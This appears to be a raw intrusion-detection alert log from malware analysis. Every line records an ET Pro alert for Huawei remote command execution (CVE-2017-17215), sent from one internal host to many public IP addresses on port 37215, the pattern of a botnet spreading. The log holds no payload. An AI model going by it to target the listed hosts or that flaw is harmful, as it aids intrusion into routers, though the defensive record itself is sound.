                                                    07/10/24-08:27:05.160089TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3514237215192.168.2.14187.106.72.51
                                                    07/10/24-08:26:11.600556TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3472837215192.168.2.1441.144.102.136
                                                    07/10/24-08:27:22.476492TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5709637215192.168.2.14157.184.234.239
                                                    07/10/24-08:27:33.764696TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4262237215192.168.2.14197.27.98.50
                                                    07/10/24-08:27:13.834773TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3798037215192.168.2.1486.180.3.171
                                                    07/10/24-08:26:28.774897TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4863837215192.168.2.14157.33.111.95
                                                    07/10/24-08:27:07.249452TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6005237215192.168.2.1441.62.42.58
                                                    07/10/24-08:26:34.231574TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4478837215192.168.2.14157.113.245.129
                                                    07/10/24-08:26:45.633105TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3297237215192.168.2.14197.120.221.78
                                                    07/10/24-08:27:13.970861TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5868237215192.168.2.14157.14.246.250
                                                    07/10/24-08:27:22.562470TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5239037215192.168.2.14157.232.152.143
                                                    07/10/24-08:26:26.593933TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5698237215192.168.2.14157.228.35.182
                                                    07/10/24-08:27:10.591175TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5765637215192.168.2.1441.113.115.170
                                                    07/10/24-08:26:11.537516TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3285037215192.168.2.14157.101.215.139
                                                    07/10/24-08:26:47.819008TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4925037215192.168.2.14157.198.36.132
                                                    07/10/24-08:27:33.729684TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3652437215192.168.2.1441.116.3.49
                                                    07/10/24-08:27:33.730213TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4821237215192.168.2.1491.84.108.231
                                                    07/10/24-08:26:59.623899TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4282837215192.168.2.14197.57.115.26
                                                    07/10/24-08:27:23.957174TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5305437215192.168.2.14197.58.115.105
                                                    07/10/24-08:26:11.484842TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5800837215192.168.2.145.96.24.64
                                                    07/10/24-08:27:19.261102TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5206837215192.168.2.1441.27.160.143
                                                    07/10/24-08:27:32.553742TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5481237215192.168.2.14197.45.70.68
                                                    07/10/24-08:27:17.087827TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3324437215192.168.2.1463.190.44.244
                                                    07/10/24-08:26:43.825579TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3463437215192.168.2.14197.96.118.31
                                                    07/10/24-08:26:31.067325TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3508437215192.168.2.1441.53.64.84
                                                    07/10/24-08:26:28.741314TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5931637215192.168.2.14157.178.150.145
                                                    07/10/24-08:27:23.962913TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5029437215192.168.2.14157.164.192.40
                                                    07/10/24-08:26:52.022407TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3702837215192.168.2.1441.79.136.40
                                                    07/10/24-08:27:31.474982TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5236637215192.168.2.14157.226.116.17
                                                    07/10/24-08:26:36.437126TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3507837215192.168.2.1441.98.94.21
                                                    07/10/24-08:26:23.294907TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4891837215192.168.2.14157.60.120.138
                                                    07/10/24-08:26:49.842206TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5547237215192.168.2.1441.155.255.255
                                                    07/10/24-08:26:53.196604TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4671837215192.168.2.14157.103.0.56
                                                    07/10/24-08:27:10.751291TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4032037215192.168.2.14197.159.86.226
                                                    07/10/24-08:27:23.866031TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5037637215192.168.2.14102.127.243.110
                                                    07/10/24-08:27:20.523161TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5020437215192.168.2.14197.228.246.80
                                                    07/10/24-08:27:33.840448TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3660637215192.168.2.1441.238.136.20
                                                    07/10/24-08:26:15.875137TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3991437215192.168.2.1441.117.253.175
                                                    07/10/24-08:26:26.596367TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5992037215192.168.2.14157.143.63.236
                                                    07/10/24-08:27:22.926272TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4385237215192.168.2.1480.49.73.249
                                                    07/10/24-08:27:05.081502TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4443237215192.168.2.14104.169.105.246
                                                    07/10/24-08:26:26.527287TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5068437215192.168.2.14201.67.9.127
                                                    07/10/24-08:27:19.216648TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5100237215192.168.2.1441.227.179.150
                                                    07/10/24-08:26:57.645172TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4209637215192.168.2.14157.54.77.35
                                                    07/10/24-08:26:22.259502TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5524437215192.168.2.1441.120.159.171
                                                    07/10/24-08:26:59.642671TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4681437215192.168.2.1441.197.58.102
                                                    07/10/24-08:26:55.407973TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4959837215192.168.2.14157.172.224.163
                                                    07/10/24-08:26:36.358429TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6076037215192.168.2.14212.96.171.167
                                                    07/10/24-08:26:41.482479TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5285637215192.168.2.1485.192.248.10
                                                    07/10/24-08:26:47.988456TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4853837215192.168.2.1441.61.130.45
                                                    07/10/24-08:26:26.529010TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5134237215192.168.2.14157.191.190.210
                                                    07/10/24-08:27:10.668166TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4311237215192.168.2.1442.165.46.53
                                                    07/10/24-08:27:19.164570TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5895637215192.168.2.14157.62.69.50
                                                    07/10/24-08:27:07.368181TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5481237215192.168.2.14197.200.180.237
                                                    07/10/24-08:26:28.937800TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3399837215192.168.2.14184.139.44.172
                                                    07/10/24-08:27:28.139469TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5240037215192.168.2.14197.105.109.223
                                                    07/10/24-08:26:22.256236TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3745637215192.168.2.1441.92.39.222
                                                    07/10/24-08:26:55.385980TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3654437215192.168.2.1475.150.67.40
                                                    07/10/24-08:27:10.548038TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5075037215192.168.2.1441.163.135.89
                                                    07/10/24-08:26:36.327506TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4792637215192.168.2.1441.192.6.97
                                                    07/10/24-08:26:49.792004TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3883237215192.168.2.14157.16.214.109
                                                    07/10/24-08:27:27.160309TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4141637215192.168.2.14123.65.189.169
                                                    07/10/24-08:26:29.854453TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5992837215192.168.2.14197.96.68.77
                                                    07/10/24-08:26:43.610396TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4622037215192.168.2.1441.120.5.168
                                                    07/10/24-08:27:11.526657TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4627437215192.168.2.14157.132.233.162
                                                    07/10/24-08:26:20.122842TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4470437215192.168.2.14170.176.88.38
                                                    07/10/24-08:27:23.917570TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5972637215192.168.2.1441.169.230.185
                                                    07/10/24-08:26:22.290741TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4519837215192.168.2.14157.194.96.145
                                                    07/10/24-08:27:19.247014TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5805437215192.168.2.14197.218.115.174
                                                    07/10/24-08:26:47.880979TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4543837215192.168.2.14157.201.132.158
                                                    07/10/24-08:26:26.608381TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5349237215192.168.2.14197.105.149.232
                                                    07/10/24-08:26:28.710871TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3740837215192.168.2.14157.166.29.220
                                                    07/10/24-08:26:43.870902TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4207837215192.168.2.1441.29.212.23
                                                    07/10/24-08:26:25.463827TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4809037215192.168.2.14157.111.55.191
                                                    07/10/24-08:27:32.523426TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3284437215192.168.2.14157.217.43.124
                                                    07/10/24-08:26:41.466063TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5371837215192.168.2.14155.109.218.27
                                                    07/10/24-08:26:49.796978TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6061437215192.168.2.1441.156.83.91
                                                    07/10/24-08:26:14.811511TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3526037215192.168.2.1441.39.59.3
                                                    07/10/24-08:27:22.882640TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4740637215192.168.2.14172.160.238.57
                                                    07/10/24-08:27:23.953433TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5574637215192.168.2.14197.247.251.70
                                                    07/10/24-08:27:13.750468TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4954837215192.168.2.14157.195.7.132
                                                    07/10/24-08:27:22.487883TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5290637215192.168.2.14157.200.177.73
                                                    07/10/24-08:26:26.529610TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5853837215192.168.2.1441.28.224.82
                                                    07/10/24-08:26:47.857207TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4435637215192.168.2.14157.114.160.16
                                                    07/10/24-08:26:15.811251TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4199237215192.168.2.1441.129.105.53
                                                    07/10/24-08:27:22.773467TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3768437215192.168.2.14157.244.183.48
                                                    07/10/24-08:26:48.010127TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4842637215192.168.2.14197.192.190.150
                                                    07/10/24-08:27:08.307803TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5519637215192.168.2.1441.90.67.247
                                                    07/10/24-08:26:22.216142TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4848437215192.168.2.1441.104.199.102
                                                    07/10/24-08:26:29.822665TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5185437215192.168.2.14104.93.79.66
                                                    07/10/24-08:26:28.782504TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4224237215192.168.2.14157.252.63.15
                                                    07/10/24-08:26:13.836737TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4821037215192.168.2.1441.56.231.65
                                                    07/10/24-08:26:41.354295TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4282437215192.168.2.14197.176.197.60
                                                    07/10/24-08:27:33.752992TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4114837215192.168.2.14190.179.118.87
                                                    07/10/24-08:26:22.272664TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5302637215192.168.2.14157.164.218.155
                                                    07/10/24-08:27:19.284664TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4501037215192.168.2.14157.134.203.53
                                                    07/10/24-08:27:31.488835TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4278037215192.168.2.14157.20.20.17
                                                    07/10/24-08:26:43.902594TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4922637215192.168.2.14197.22.150.114
                                                    07/10/24-08:26:52.070871TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6009837215192.168.2.14157.171.98.184
                                                    07/10/24-08:26:59.579530TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4652437215192.168.2.14157.244.246.195
                                                    07/10/24-08:26:59.877508TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5500437215192.168.2.14114.2.2.211
                                                    07/10/24-08:26:22.237205TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5940237215192.168.2.1441.136.158.21
                                                    07/10/24-08:26:48.005447TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5804037215192.168.2.14197.162.32.148
                                                    07/10/24-08:27:17.060305TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3646037215192.168.2.1468.73.174.107
                                                    07/10/24-08:26:43.867086TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5214237215192.168.2.14157.131.131.14
                                                    07/10/24-08:27:07.350674TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5842437215192.168.2.14157.11.233.186
                                                    07/10/24-08:27:08.393293TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3766237215192.168.2.14197.39.171.3
                                                    07/10/24-08:27:13.889582TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5878437215192.168.2.14157.217.39.25
                                                    07/10/24-08:27:22.889193TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4344237215192.168.2.14157.251.171.134
                                                    07/10/24-08:27:03.012568TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4632837215192.168.2.14157.237.37.2
                                                    07/10/24-08:26:36.351608TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4841037215192.168.2.14136.150.188.27
                                                    07/10/24-08:27:19.157761TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5901637215192.168.2.1473.1.39.83
                                                    07/10/24-08:27:32.603440TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3613237215192.168.2.1441.82.220.212
                                                    07/10/24-08:26:28.778339TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4679437215192.168.2.1441.112.213.31
                                                    07/10/24-08:27:05.225360TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5103837215192.168.2.14157.229.1.145
                                                    07/10/24-08:27:22.472929TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5578437215192.168.2.14157.219.162.22
                                                    07/10/24-08:26:14.814574TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3798437215192.168.2.1441.172.101.128
                                                    07/10/24-08:26:25.449371TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3387637215192.168.2.14124.125.210.163
                                                    07/10/24-08:27:10.625472TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6001637215192.168.2.14157.245.85.134
                                                    07/10/24-08:27:02.879957TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5488437215192.168.2.1474.90.71.206
                                                    07/10/24-08:26:20.132092TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5969837215192.168.2.14197.30.112.103
                                                    07/10/24-08:26:59.589721TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5639237215192.168.2.1441.164.75.91
                                                    07/10/24-08:27:23.503525TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5620237215192.168.2.1441.229.251.152
                                                    07/10/24-08:26:36.416571TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3557437215192.168.2.1418.3.195.106
                                                    07/10/24-08:26:42.441325TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6041637215192.168.2.14157.152.61.49
                                                    07/10/24-08:27:05.165980TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4847437215192.168.2.14157.158.16.249
                                                    07/10/24-08:27:22.527598TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5079437215192.168.2.1494.37.51.121
                                                    07/10/24-08:27:22.917695TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5207037215192.168.2.14202.24.125.140
                                                    07/10/24-08:26:53.125046TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4402037215192.168.2.14154.233.156.229
                                                    07/10/24-08:27:33.953196TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5692637215192.168.2.1493.116.178.96
                                                    07/10/24-08:26:34.251160TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5862637215192.168.2.1441.52.79.81
                                                    07/10/24-08:27:30.472890TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3457237215192.168.2.1441.225.213.48
                                                    07/10/24-08:26:13.836737TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5847437215192.168.2.1441.184.150.18
                                                    07/10/24-08:26:29.811395TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5558237215192.168.2.1441.219.213.191
                                                    07/10/24-08:27:03.044130TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5220237215192.168.2.14157.161.95.221
                                                    07/10/24-08:26:57.505906TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5100037215192.168.2.1441.179.151.107
                                                    07/10/24-08:27:17.084652TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4785237215192.168.2.14197.172.184.79
                                                    07/10/24-08:26:23.328153TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5123837215192.168.2.14197.172.200.40
                                                    07/10/24-08:26:42.385136TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5997437215192.168.2.1441.181.233.94
                                                    07/10/24-08:27:30.516860TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3953437215192.168.2.14130.115.214.113
                                                    07/10/24-08:26:36.402150TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5975437215192.168.2.1441.127.69.39
                                                    07/10/24-08:27:02.869680TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5257237215192.168.2.14197.81.181.97
                                                    07/10/24-08:27:27.164034TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4419237215192.168.2.14157.207.158.234
                                                    07/10/24-08:26:43.856431TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5959237215192.168.2.14197.78.255.63
                                                    07/10/24-08:27:28.115496TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4928437215192.168.2.14126.241.144.116
                                                    07/10/24-08:26:20.119674TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3566837215192.168.2.1463.67.206.3
                                                    07/10/24-08:26:53.171769TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4571437215192.168.2.1419.22.128.42
                                                    07/10/24-08:27:16.998730TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3693237215192.168.2.14197.81.115.112
                                                    07/10/24-08:26:14.623254TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5500237215192.168.2.14157.49.115.214
                                                    07/10/24-08:27:31.507602TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3948437215192.168.2.14197.116.224.244
                                                    07/10/24-08:26:18.008253TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3549837215192.168.2.14197.47.104.236
                                                    07/10/24-08:26:55.296464TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5025037215192.168.2.1469.205.82.65
                                                    07/10/24-08:26:43.925849TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4047037215192.168.2.14157.37.79.181
                                                    07/10/24-08:26:20.139593TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4065037215192.168.2.14197.193.98.245
                                                    07/10/24-08:26:47.930940TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6099437215192.168.2.14157.51.92.102
                                                    07/10/24-08:26:34.209282TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3654237215192.168.2.14157.0.230.213
                                                    07/10/24-08:26:57.505236TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4496037215192.168.2.14197.202.126.21
                                                    07/10/24-08:27:11.513310TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5575037215192.168.2.1441.95.77.215
                                                    07/10/24-08:26:14.814153TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5355637215192.168.2.1431.122.229.114
                                                    07/10/24-08:26:47.951146TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3903437215192.168.2.14130.193.168.8
                                                    07/10/24-08:26:45.603573TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4222837215192.168.2.14157.191.194.66
                                                    07/10/24-08:27:22.890637TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5251837215192.168.2.1475.67.208.160
                                                    07/10/24-08:27:05.199033TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3896437215192.168.2.14157.77.249.181
                                                    07/10/24-08:27:13.821623TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4458037215192.168.2.14157.201.185.247
                                                    07/10/24-08:27:24.997758TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4437437215192.168.2.14132.70.38.13
                                                    07/10/24-08:26:11.663156TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3714637215192.168.2.14197.172.12.130
                                                    07/10/24-08:26:26.600239TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3455437215192.168.2.1441.34.207.27
                                                    07/10/24-08:26:53.200630TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6006637215192.168.2.14197.142.20.71
                                                    07/10/24-08:26:25.464906TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5699637215192.168.2.14157.18.60.250
                                                    07/10/24-08:26:59.683410TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5635837215192.168.2.14190.27.199.39
                                                    07/10/24-08:26:47.908603TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4087237215192.168.2.1441.199.116.51
                                                    07/10/24-08:26:31.091002TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3455037215192.168.2.1441.77.23.78
                                                    07/10/24-08:27:33.922247TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3457837215192.168.2.14157.166.216.250
                                                    07/10/24-08:26:55.428657TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5381837215192.168.2.14197.159.26.190
                                                    07/10/24-08:26:41.476455TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5406637215192.168.2.14197.253.79.215
                                                    07/10/24-08:26:36.392573TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3761437215192.168.2.14206.240.196.251
                                                    07/10/24-08:27:08.411856TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5481837215192.168.2.14157.10.74.142
                                                    07/10/24-08:27:27.070313TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4290637215192.168.2.14157.37.53.144
                                                    07/10/24-08:27:02.887848TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5048237215192.168.2.14197.229.104.77
                                                    07/10/24-08:26:59.848554TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5708837215192.168.2.14219.162.170.141
                                                    07/10/24-08:26:43.772556TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5702637215192.168.2.14197.42.119.64
                                                    07/10/24-08:27:05.189042TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5396837215192.168.2.1441.41.121.64
                                                    07/10/24-08:27:23.924577TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4456637215192.168.2.14157.172.112.52
                                                    07/10/24-08:27:33.794949TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5552437215192.168.2.1441.80.88.62
                                                    07/10/24-08:26:29.829740TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5433037215192.168.2.14197.113.35.186
                                                    07/10/24-08:27:02.845496TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4877037215192.168.2.14157.139.233.231
